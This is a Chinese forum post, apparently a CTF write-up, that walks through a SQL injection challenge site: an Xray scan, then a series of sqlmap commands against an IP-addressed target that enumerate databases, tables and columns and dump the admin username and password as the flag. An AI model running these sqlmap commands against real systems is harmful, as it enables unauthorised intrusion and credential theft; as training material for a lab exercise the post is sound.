用SQLmap的方式来做——第一章:为了女神小芳!

eqwer   ·   发表于 2021-03-11 13:40:41   ·   CTF&WP专版

首先,Xray扫描

我们可以看到有两个漏洞,第一个是SQL注入 ,第二个是phpstudy漏洞

让用SQL注入做,第二个漏洞直接抛弃!
打开SQLmap,检测数据库类型

sqlmap -u "http://59.63.200.79:8003/?id=1"

mysql

查询有哪些数据库

sqlmap -u "http://59.63.200.79:8003/?id=1"  –dbms mysql –level 3 –dbs

发现可用的数据库有三个

网站名叫猫舍,数据库呢还不是maoshe???
查询maoshe数据库中有哪些表

sqlmap -u "http://59.63.200.79:8003/?id=1"  –dbms mysql –level 3 -D maoshe –tables


发现有4个表

admin一般和管理员相关
查询maoshe数据库中admin表有哪些字段

sqlmap -u "http://59.63.200.79:8003/?id=1" –dbms mysql –level 3 -D maoshe -T admin –columns


有3个字段

同时查询maoshe数据库中admin表下的username和password字段

sqlmap -u "http://59.63.200.79:8003/?id=1"  –dbms mysql –level 3 -D maoshe -T admin -C “username,password” –dump


有两条数据

用户名和密码都出来了
flag就是密码

用户名金币积分时间理由
2269064521 5.00 0 2021-03-16 14:02:50 一个受益终生的帖子~~

打赏我,让我更有动力~

0 条回复   |  直到 2021-3-11 | 1289 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.